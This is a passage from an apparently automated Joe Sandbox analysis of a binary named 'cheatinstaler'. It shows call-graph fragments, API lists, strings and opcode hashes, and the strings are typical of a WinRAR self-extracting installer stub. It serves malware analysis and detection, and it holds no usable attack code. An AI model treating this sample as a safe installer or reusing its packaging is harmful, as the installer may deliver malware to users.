27151->27153 27152->27133 27155 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27153->27155 27156 7ff6c16da74c 27154->27156 27155->27157 27158 7ff6c16b255c 61 API calls 27156->27158 27157->27144 27159 7ff6c16da795 27158->27159 27160 7ff6c16da7b1 27159->27160 27161 7ff6c16da801 SetDlgItemTextW 27159->27161 27165 7ff6c16da7a1 27159->27165 27162 7ff6c16e2320 _handle_error 8 API calls 27160->27162 27161->27160 27163 7ff6c16da827 27162->27163 27163->26571 27164 7ff6c16da7ad 27164->27160 27166 7ff6c16da7b7 EndDialog 27164->27166 27165->27160 27165->27164 27266 7ff6c16cbb00 102 API calls 27165->27266 27166->27160 27173 7ff6c16df529 memcpy_s 27168->27173 27186 7ff6c16df87d 27168->27186 27169 7ff6c16b1fa0 31 API calls 27170 7ff6c16df89c 27169->27170 27171 7ff6c16e2320 _handle_error 8 API calls 27170->27171 27172 7ff6c16df8a8 27171->27172 27172->26575 27174 7ff6c16df684 27173->27174 27267 7ff6c16d13c4 CompareStringW 27173->27267 27176 7ff6c16b129c 33 API calls 27174->27176 27177 7ff6c16df6c0 27176->27177 27178 7ff6c16c32a8 51 API calls 27177->27178 27179 7ff6c16df6ca 27178->27179 27180 7ff6c16b1fa0 31 API calls 27179->27180 27183 7ff6c16df6d5 27180->27183 27181 7ff6c16df742 ShellExecuteExW 27182 7ff6c16df846 27181->27182 27188 7ff6c16df755 27181->27188 27182->27186 27190 7ff6c16df8fb 27182->27190 27183->27181 27185 7ff6c16b129c 33 API calls 27183->27185 27184 7ff6c16df78e 27269 7ff6c16dfe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27184->27269 27189 7ff6c16df717 27185->27189 27186->27169 27187 7ff6c16df7e3 CloseHandle 27191 7ff6c16df7f2 27187->27191 27199 7ff6c16df801 27187->27199 27188->27184 27188->27187 27196 7ff6c16df781 ShowWindow 27188->27196 27268 7ff6c16c5b60 53 API calls 2 library calls 27189->27268 27193 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27190->27193 27270 7ff6c16d13c4 CompareStringW 27191->27270 27194 7ff6c16df900 27193->27194 27196->27184 27198 7ff6c16df725 27201 7ff6c16b1fa0 31 API 
calls 27198->27201 27199->27182 27202 7ff6c16df837 ShowWindow 27199->27202 27200 7ff6c16df7a6 27200->27187 27204 7ff6c16df7b4 GetExitCodeProcess 27200->27204 27203 7ff6c16df72f 27201->27203 27202->27182 27203->27181 27204->27187 27205 7ff6c16df7c7 27204->27205 27205->27187 27206->26634 27207->26634 27208->26634 27209->26634 27210->26634 27211->26634 27212->26634 27213->26634 27214->26634 27215->26634 27217 7ff6c16c72ea 27216->27217 27271 7ff6c16bb3a8 27217->27271 27221 7ff6c16c31e4 27220->27221 27222 7ff6c16c31e7 DeleteFileW 27220->27222 27221->27222 27223 7ff6c16c31fd 27222->27223 27231 7ff6c16c327c 27222->27231 27225 7ff6c16c6a0c 49 API calls 27223->27225 27224 7ff6c16e2320 _handle_error 8 API calls 27226 7ff6c16c3291 27224->27226 27227 7ff6c16c3222 27225->27227 27226->26634 27228 7ff6c16c3243 27227->27228 27229 7ff6c16c3226 DeleteFileW 27227->27229 27230 7ff6c16c32a1 27228->27230 27228->27231 27229->27228 27232 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27230->27232 27231->27224 27233 7ff6c16c32a6 27232->27233 27235->26634 27236->26634 27237->26634 27238->26634 27240 7ff6c16c7e0c 27239->27240 27241 7ff6c16c7e55 27240->27241 27242 7ff6c16c7e23 27240->27242 27275 7ff6c16b704c 47 API calls memcpy_s 27241->27275 27244 7ff6c16b129c 33 API calls 27242->27244 27246 7ff6c16c7e47 27244->27246 27245 7ff6c16c7e5a 27246->26634 27247->26634 27248->26634 27251 7ff6c16cd25e 27249->27251 27250 7ff6c16cd292 27250->26621 27251->27250 27252 7ff6c16b1744 33 API calls 27251->27252 27252->27251 27253->26523 27254->26512 27256->26492 27257->26495 27258->26498 27259->26552 27260->26541 27262->26547 27264->27134 27265->27143 27266->27164 27267->27174 27268->27198 27269->27200 27270->27199 27274 7ff6c16bb3f2 memcpy_s 27271->27274 27272 7ff6c16e2320 _handle_error 8 API calls 27273 7ff6c16bb4b6 27272->27273 27273->26634 27274->27272 27275->27245 27332 7ff6c16c86ec 27276->27332 27278 7ff6c16be3c4 27338 7ff6c16be600 27278->27338 27280 7ff6c16be4d4 27283 7ff6c16e21d0 33 API 
calls 27280->27283 27281 7ff6c16be549 27284 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27281->27284 27282 7ff6c16be454 27282->27280 27282->27281 27285 7ff6c16be4f0 27283->27285 27286 7ff6c16be54e 27284->27286 27344 7ff6c16d3148 102 API calls 27285->27344 27289 7ff6c16c190d 27286->27289 27291 7ff6c16c18c2 27286->27291 27293 7ff6c16b1fa0 31 API calls 27286->27293 27288 7ff6c16be51d 27290 7ff6c16e2320 _handle_error 8 API calls 27288->27290 27289->26642 27292 7ff6c16be52d 27290->27292 27291->27289 27294 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27291->27294 27292->26642 27293->27286 27295 7ff6c16c193b 27294->27295 27299 7ff6c16be7ea 27296->27299 27297 7ff6c16be864 27300 7ff6c16be993 27297->27300 27302 7ff6c16be8a1 27297->27302 27299->27297 27299->27302 27345 7ff6c16c3ec8 27299->27345 27303 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27300->27303 27301 7ff6c16be900 27308 7ff6c16be955 27301->27308 27388 7ff6c16b28a4 82 API calls 2 library calls 27301->27388 27302->27301 27352 7ff6c16bf578 27302->27352 27305 7ff6c16be998 27303->27305 27304 7ff6c16e2320 _handle_error 8 API calls 27307 7ff6c16be97e 27304->27307 27310 7ff6c16be578 27307->27310 27308->27304 28389 7ff6c16c15d8 27310->28389 27313 7ff6c16be59e 27315 7ff6c16b1fa0 31 API calls 27313->27315 27314 7ff6c16d1870 108 API calls 27314->27313 27316 7ff6c16be5b7 27315->27316 27317 7ff6c16b1fa0 31 API calls 27316->27317 27318 7ff6c16be5c3 27317->27318 27319 7ff6c16b1fa0 31 API calls 27318->27319 27320 7ff6c16be5cf 27319->27320 27321 7ff6c16c878c 108 API calls 27320->27321 27322 7ff6c16be5db 27321->27322 27323 7ff6c16b1fa0 31 API calls 27322->27323 27324 7ff6c16be5e4 27323->27324 27325 7ff6c16b1fa0 31 API calls 27324->27325 27328 7ff6c16be5ed 27325->27328 27326 7ff6c16c18c2 27327 7ff6c16c190d 27326->27327 27329 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27326->27329 27327->26646 27328->27326 27328->27327 27330 7ff6c16b1fa0 31 API calls 27328->27330 27331 
7ff6c16c193b 27329->27331 27330->27328 27333 7ff6c16c870a 27332->27333 27334 7ff6c16e21d0 33 API calls 27333->27334 27336 7ff6c16c872f 27334->27336 27335 7ff6c16e21d0 33 API calls 27337 7ff6c16c8759 27335->27337 27336->27335 27337->27278 27339 7ff6c16be627 27338->27339 27342 7ff6c16be62c memcpy_s 27338->27342 27340 7ff6c16b1fa0 31 API calls 27339->27340 27340->27342 27341 7ff6c16b1fa0 31 API calls 27343 7ff6c16be668 memcpy_s 27341->27343 27342->27341 27342->27343 27343->27282 27344->27288 27346 7ff6c16c72cc 8 API calls 27345->27346 27347 7ff6c16c3ee1 27346->27347 27351 7ff6c16c3f0f 27347->27351 27389 7ff6c16c40bc 27347->27389 27350 7ff6c16c3efa FindClose 27350->27351 27351->27299 27353 7ff6c16bf598 _snwprintf 27352->27353 27428 7ff6c16b2950 27353->27428 27356 7ff6c16bf5cc 27360 7ff6c16bf5fc 27356->27360 27443 7ff6c16b33e4 27356->27443 27359 7ff6c16bf5f8 27359->27360 27475 7ff6c16b3ad8 27359->27475 27694 7ff6c16b2c54 27360->27694 27367 7ff6c16bf7cb 27485 7ff6c16bf8a4 27367->27485 27369 7ff6c16b8d04 33 API calls 27370 7ff6c16bf662 27369->27370 27714 7ff6c16c7918 48 API calls 2 library calls 27370->27714 27372 7ff6c16bf677 27373 7ff6c16c3ec8 55 API calls 27372->27373 27380 7ff6c16bf6ad 27373->27380 27375 7ff6c16bf842 27375->27360 27506 7ff6c16b69f8 27375->27506 27517 7ff6c16bf930 27375->27517 27381 7ff6c16bf89a 27380->27381 27382 7ff6c16bf74d 27380->27382 27383 7ff6c16c3ec8 55 API calls 27380->27383 27715 7ff6c16c7918 48 API calls 2 library calls 27380->27715 27384 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27381->27384 27382->27367 27382->27381 27385 7ff6c16bf895 27382->27385 27383->27380 27387 7ff6c16bf8a0 27384->27387 27386 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27385->27386 27386->27381 27388->27308 27390 7ff6c16c41d2 FindNextFileW 27389->27390 27391 7ff6c16c40f9 FindFirstFileW 27389->27391 27393 7ff6c16c41e1 GetLastError 27390->27393 27394 7ff6c16c41f3 27390->27394 27391->27394 27395 7ff6c16c411e 27391->27395 27414 
7ff6c16c41c0 27393->27414 27398 7ff6c16b20b0 33 API calls 27394->27398 27400 7ff6c16c4211 27394->27400 27396 7ff6c16c6a0c 49 API calls 27395->27396 27397 7ff6c16c4144 27396->27397 27403 7ff6c16c4148 FindFirstFileW 27397->27403 27404 7ff6c16c4167 27397->27404 27398->27400 27399 7ff6c16e2320 _handle_error 8 API calls 27401 7ff6c16c3ef4 27399->27401 27402 7ff6c16b129c 33 API calls 27400->27402 27401->27350 27401->27351 27405 7ff6c16c423b 27402->27405 27403->27404 27404->27394 27407 7ff6c16c41af GetLastError 27404->27407 27409 7ff6c16c4314 27404->27409 27415 7ff6c16c8090 27405->27415 27407->27414 27410 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27409->27410 27411 7ff6c16c431a 27410->27411 27412 7ff6c16c430f 27413 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27412->27413 27413->27409 27414->27399 27416 7ff6c16c80a5 27415->27416 27419 7ff6c16c8188 27416->27419 27418 7ff6c16c4249 27418->27412 27418->27414 27420 7ff6c16c8326 27419->27420 27422 7ff6c16c81ba 27419->27422 27427 7ff6c16b704c 47 API calls memcpy_s 27420->27427 27425 7ff6c16c81d4 memcpy_s 27422->27425 27426 7ff6c16c58a4 33 API calls 2 library calls 27422->27426 27423 7ff6c16c832b 27425->27418 27426->27425 27427->27423 27429 7ff6c16b296c 27428->27429 27430 7ff6c16c86ec 33 API calls 27429->27430 27431 7ff6c16b298d 27430->27431 27432 7ff6c16e21d0 33 API calls 27431->27432 27436 7ff6c16b2ac2 27431->27436 27434 7ff6c16b2ab0 27432->27434 27434->27436 27716 7ff6c16b91c8 27434->27716 27723 7ff6c16c4d04 27436->27723 27438 7ff6c16c2ca8 27755 7ff6c16c24c0 27438->27755 27441 7ff6c16c2cc5 27441->27356 27774 7ff6c16c28d0 27443->27774 27444 7ff6c16b344e 27446 7ff6c16b3674 27444->27446 27451 7ff6c16b3682 27444->27451 27445 7ff6c16b3431 memcpy_s 27445->27444 27448 7ff6c16b3601 27445->27448 27779 7ff6c16c2bb0 27445->27779 27793 7ff6c16b28a4 82 API calls 2 library calls 27446->27793 27448->27359 27449 7ff6c16b69f8 132 API calls 27449->27451 27451->27448 27451->27449 27453 7ff6c16b370c 27451->27453 
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
                                                                                                  • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                                  • API String ID: 3303814210-2702805183
                                                                                                  • Opcode ID: 937210c2e510caa8de60326d0bf769a59ef258c76f9eb9a3915c043d96f2bb73
                                                                                                  • Instruction ID: b8c5a99de3e7be0c8efc76c9656348629b70b6803dd51c0141a6a82b96ba65ac
                                                                                                  • Opcode Fuzzy Hash: 937210c2e510caa8de60326d0bf769a59ef258c76f9eb9a3915c043d96f2bb73
                                                                                                  • Instruction Fuzzy Hash: B3D2A462A0878641EB20EF27E8542F96361FF86786F604135D9CD877AADF3CE644E740
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
                                                                                                  • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                                  • API String ID: 1830998149-3916287355
                                                                                                  • Opcode ID: 7f7cf621285890d289b7a5689e1f5a4e564ca718d967f11b89b90c9b9141b20d
                                                                                                  • Instruction ID: ad32ea0407e7ef0f3fd6ca8b539a5bec247c4be529634ad2d4072cc2da942b53
                                                                                                  • Opcode Fuzzy Hash: 7f7cf621285890d289b7a5689e1f5a4e564ca718d967f11b89b90c9b9141b20d
                                                                                                  • Instruction Fuzzy Hash: 9D13CF72B04B8299EB10EF66D8402EC27B1FB4139AF604135DADD97AD9DF38E585E340

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                  • API String ID: 1048086575-3710569615
                                                                                                  • Opcode ID: 7fb843965e060d2caf1f274bd47349aa60f49b36b68f6f054b76b7ae27a5abf6
                                                                                                  • Instruction ID: 7737979ea7f472a1aa3fc29db5687d501243a2d2bf5778ee231d32b46211a27d
                                                                                                  • Opcode Fuzzy Hash: 7fb843965e060d2caf1f274bd47349aa60f49b36b68f6f054b76b7ae27a5abf6
                                                                                                  • Instruction Fuzzy Hash: 4312A521B18B8285EB10DF26EC552B96361FF85786F504231DADD87BA6DF3CE240E740

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                                                                                  • String ID: $%s:$CAPTION
                                                                                                  • API String ID: 1936833115-404845831
                                                                                                  • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                                  • Instruction ID: 15e4a566c358f155d838706601cf89f9929580be20332c836bbfe673dea67c43
                                                                                                  • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                                  • Instruction Fuzzy Hash: 65910832B186418AEB14DF2AE8106AAA7A1FBC4785F505535EECD87B59DF3CE905CB00

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                                  • String ID: PNG
                                                                                                  • API String ID: 541704414-364855578
                                                                                                  • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                                  • Instruction ID: 1b013200bc1eb9a3611ace8fb7c2e97576cc8fe13c96b5ea48a005b759dffb35
                                                                                                  • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                                  • Instruction Fuzzy Hash: FF412D25B09B0282EF049F17D85837963A4AF88B96F144435DEDD873A4EF7CE469D740
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID: __tmp_reference_source_
                                                                                                  • API String ID: 3668304517-685763994
                                                                                                  • Opcode ID: 6851538e357941a99ebb696b081bc24ed3bcd29be91ebe21427510cb9cba344c
                                                                                                  • Instruction ID: 1321c4b14bbaec7f046a777dd2950280d1c2c3cc3c4cc5469397de9846e06dec
                                                                                                  • Opcode Fuzzy Hash: 6851538e357941a99ebb696b081bc24ed3bcd29be91ebe21427510cb9cba344c
                                                                                                  • Instruction Fuzzy Hash: EFE29066A086C292EF64DF66E0503BEA7A1FB81785F404136DBDD83AA5CF3CE455E700
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID: CMT
                                                                                                  • API String ID: 3668304517-2756464174
                                                                                                  • Opcode ID: f3c9c95c157df1c99ad266365504da1f39fa52ba75423407634179f88c0c16ad
                                                                                                  • Instruction ID: a3f599713d6e075609997949807ad7e237c74a099133a41c13dc2c2689b9ccc4
                                                                                                  • Opcode Fuzzy Hash: f3c9c95c157df1c99ad266365504da1f39fa52ba75423407634179f88c0c16ad
                                                                                                  • Instruction Fuzzy Hash: E0E2EF22B0868286EB28DF76D4502FE67A1FB45386F444136EADE87796DF3CE455E300

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                                  • String ID:
                                                                                                  • API String ID: 474548282-0
                                                                                                  • Opcode ID: 5b7a682f346ba33cc6e8113bf8bb974c5d06c867b30d63dc8f71ee7e42fd28a6
                                                                                                  • Instruction ID: 245333192ea5e8f740b6b7347bc6f001a3b70ec3daa14257daf61be439aaa3b0
                                                                                                  • Opcode Fuzzy Hash: 5b7a682f346ba33cc6e8113bf8bb974c5d06c867b30d63dc8f71ee7e42fd28a6
                                                                                                  • Instruction Fuzzy Hash: AA618062A08A8281EF10EF2AE8502796361FF857A6F505331EAED83BD9DF3CD544D700

                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CMT
                                                                                                  • API String ID: 0-2756464174
                                                                                                  • Opcode ID: 1483503f4f6562bc116dab0f55c891e212737330d95d7192c6dc5e801ab4a3f4
                                                                                                  • Instruction ID: ba418ccde15b1899d1b06e2e1ed03aa9f9000188d63238c57303b22a85acda12
                                                                                                  • Opcode Fuzzy Hash: 1483503f4f6562bc116dab0f55c891e212737330d95d7192c6dc5e801ab4a3f4
                                                                                                  • Instruction Fuzzy Hash: 4142EF22B0968296EB28DF76C1502FD67A1EB51345F400136EBDE936D6DF3CE52AE300

                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                                                                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                                  • API String ID: 1496594111-2013832382
                                                                                                  • Opcode ID: 652c747d7e630e86415ee3ad066f254a367a94a472fe2acd263d178260856de2
                                                                                                  • Instruction ID: e462041f5ca948c9966cebe60edf4a86fde15a071c13dfd97e29767e636a5283
                                                                                                  • Opcode Fuzzy Hash: 652c747d7e630e86415ee3ad066f254a367a94a472fe2acd263d178260856de2
                                                                                                  • Instruction Fuzzy Hash: 87324E31A09B8295EB119F26E8502E973B8FF44356F500236EADD877A5EF3CE254D740
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF6C16C8E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6C16C8F8D
                                                                                                  • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6C16C9F75
                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16CA42F
                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16CA435
                                                                                                    • Part of subcall function 00007FF6C16D0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6C16D0B44), ref: 00007FF6C16D0BE9
                                                                                                  Similarity
